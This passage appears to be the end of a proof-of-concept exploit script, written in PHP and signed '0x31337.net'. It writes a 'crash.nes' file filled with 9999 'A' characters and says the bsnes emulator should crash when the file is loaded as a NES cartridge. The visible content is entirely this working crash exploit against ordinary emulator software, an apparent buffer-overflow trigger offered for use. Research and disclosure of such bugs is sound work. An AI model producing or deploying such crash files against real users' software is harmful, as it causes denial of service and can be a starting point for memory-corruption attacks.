'Load NES Catridge' # that contains 9999 chars ('A'), so bsnes should crash. ################################################################## # PoC / Code: $buffer = str_repeat('A', 9999); # Create 9999 chars('A').. if(file_put_contents('crash.nes', $buffer)) { echo("File created successfuly.\r\bsnes should crash when you open the file with it.\r\n"); } else { echo("Can't create file. Please try again.\r\n"); } # Cya :) # 0x31337.net #################### ?>